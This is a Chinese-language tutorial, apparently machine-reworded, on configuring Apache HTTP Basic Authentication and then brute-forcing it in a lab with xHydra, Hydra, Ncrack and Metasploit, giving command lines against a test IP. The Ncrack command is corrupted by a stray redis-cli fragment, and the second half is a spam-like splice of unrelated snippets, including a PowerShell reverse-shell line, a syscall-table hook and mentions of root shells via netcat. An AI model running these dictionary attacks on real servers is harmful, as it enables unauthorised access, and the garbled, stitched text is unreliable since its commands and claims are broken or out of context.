在这篇文章中，我们会告知我们怎么维护Apache Web服务器免受未经身份验证的用户不合法拜访，以及怎么躲藏要害中心信息不被不合法用户

查看到。当然了，我们还会介绍怎么运用这些安全缺点来浸透方针服务器，信任这也是我们十分感兴趣的东西。

HTTP基础认证（BA）

在HTTP事务处理环境中，基础拜访身份认证是HTTP用户署理在央求供给用户名和暗码时需求运用到的一种安全办法。

实际上，HTTP基础认证（BA）是完成对Web资源拜访控制的一种最简略的技能，由于它不需求规划cookie、会话辨认符或登录页面，HTTP基础认证是需求运用到HTTP头中的规范字段，并且还不需求进行握手。

可是，BA机制不会为凭据的传输供给机密性维护。它只会在传输过程中对相关信息进行Base64编码，而不会选用任何方式的加密。因而，HTTPS一般需求结合BA一同运用。

试验环境建立

1、 Apache服务器（Ubuntu 14.04）

2、 浸透检验设备（Kali Linux）

3、 设置暗码认证

4、 设备Apache有用东西包

运用下列指令设备Apache2有用包：

sudo apt-get install apache2 apache2-utils

创建暗码文件

运用htpasswd指令创建暗码文件，Apache将会用它来验证用户身份：

 

sudo htpasswd -c /etc/apache2/.htpasswd raj
cat /etc/apache2/.htpasswd
gedit etc/apache2/sites-enabled/000-default.conf

 

在虚拟主机设置中装备拜访控制

将下列装备内容保存到000-default.conf文件中：

<Directory "/var/www/html">
       AuthType Basic
       AuthName "Restricted Content"
       AuthUserFile /etc/apache2/.htpasswd
       Require valid-user
</Directory>

运用.htaccess文件装备拜访控制

翻开Apache装备文件，批改.htaccess文件来启用暗码维护，添加下列代码：

sudo gedit /etc/apache2/apache2.conf
ServerName localhost

将AllowOverride参数批改为“All”，保存并重启Apache服务：

<Directory /var/www/>
   Options Indexes FollowSymLinks
   AllowOverride All
   Require all granted
</Directory>

现在，我们需求往受限目录中添加一个.htaccess文件。这儿我们给整个网站添加约束，当然了，你也能够约束独自目录：

sudo nano /var/www/html/.htaccess
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
sudo service apache2 restart

承认暗码认证

在浏览器中检验拜访受限资源，承认你的内容已受维护。这儿会弹出如下所示的验证框：

假如你拜访的内容没有弹出认证窗，或许你取消了认证页面，那你将会看到401未授权拜访过错。

输入正确的用户名和暗码之后，你就应该能够拜访网站内容了：

运用HTTP认证缝隙xHydra

这是一款通过FTP端口和字典侵犯侵略系统的图形化东西，在Kali中翻开xHydra，选择“Single Target option”，设置方针IP，其他按下图勾选：

Passwords标签页装备如下，装备好字典文件：

切换到Start标签，点击“Start”，能够看到字典侵犯的进展以及终究的成果：

Hydra

Hydra能够针对50种协议进行快速的字典侵犯，其间包含telnet、ftp、http、https、 *** b以及多种502BD7662A553397BBDCFA27B585D740A20C49FC数据库。操作指令如下：

hydra -L user.txt -P pass.txt 192.168.0.105 http-get

Ncrack

Ncrack是一款高速 *** 认证破解东西，它能够协助企业检验 *** 安全状况，并辨认弱暗码。操作指令如下：

ncrack -U user.txt登录redis并批改其装备 redis-cli -h 192.168.192.133 -P pass.txt http://192.168.0.105

Metasploit

下面这个模块能够对HTTP认证服务进行侵犯，翻开Kali终端，输入“msfconsole”，然后输入下列指令：

use auxiliary/scanner/http/http_login
msf auxiliary(scanner/http/http_login) > set user_file  user.txt
msf auxiliary(scanner/http/http_login) > set pass_file  pass.txt
msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105
msf auxiliary(scanner/http/http_login) >  set stop_on_success
msf auxiliary(scanner/http/http_login) > exploit

跋文

期望这篇文章的内容能够协助我们了解HTTP弱装备的安全风险，并协助我们更好地提高自己网站的安全性。

 

* 参阅来历：hackingarticles，FB小编Alpha_h4ck编译，转载请注明来自FreeBuf.COM

黑客技术渠道:多种测验HTTP身份验证的办法

研究人员通过CNMAE域名记载接收了子域，并将一切到主机的央求到非注册的Azure的子域。通过一个一般的Azure账户，就能够注册一个子域并添加对应的主机名（host name）。这样就能够控制主机上的内容。2) 云控作业部分 ：多种测试HTTP身份验证的 ***

黑客技术平台创建检验项目后，下一步是设置代码签名证书。首要，翻开Xcode首选项，然后选择“Accounts”。要添加Apple ID帐户，请单击左下角的加号并登录你的帐户。然后单击右下角的“Manage Certificates”。5. 通过在保存ADB和Fastboot二进制文件的同一目录中翻开指令提示符/Power Shell/Terminal，并根据你其时的操作系统输入以下指令，保证你的PC能够正常辨认你的Pixel 3手机：最近，在出名的Emotet银行木马中发现了一个生动的活动，它运用了免费系统东西但目的不明。 US-CERT本年（2018年）发布了针对这个特定版其他Emotet的警报，提到其运用了NirSoft Password-Recovery东西。手动删去此文件会在 5 秒钟后重现生成出现。

由于大多数Linux操作系统都设备了netcat，是以能够或许将提权后的敕令提高为root shell。根除结束后终究还得copy或许重装正常的系统指令。2.有缝隙的IoT装备黑客技术平台

控制端实行：9.6.3

4. SQL注入

在侵犯机器中设备好python 2.6.6和pywin32,并设置好python的环境变量，以便我们在cmd中运用。该研讨团队的Siamak Shahandashti博士标明：“这就好比是在玩拼图相同，你所得到的信息越多，你就能够越快拼出无缺的图。”$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)

多种测试HTTP身份验证的 ***

黑客技术平台-trigger 标明主题中你想用来触发规则的指令action = iptables[name=SSH, port=ssh, protocol=tcp] #动作的相关参数，对应action.d/iptables.conf文件

斐讯K1之所以能免费，有两大“秘籍”。一是附赠的铃铛卡，第二个是关键，待会再说。

声明：本文仅仅是入门和基础，你需求根据自己的需求来扩展。

sys_call_table[__NR_mkdir] = fake_mkdir;黑客技术平台

正如你所了解的那样，USB交互设备和USB存储器这两大类USB设备是现在我们运用最为广泛的。

公有云运维安全四大风险第四步：多种测试HTTP身份验证的 ***

"id": redacted,这儿我现已知道了机器的IP地址，不过由于network::arp Brik的存在你能够通过在vboxnet0接口上进行ARP扫描来获得IP地址。7、我国#Blockip/net(subnet)
本文标题:黑客技术渠道:多种测验HTTP身份验证的办法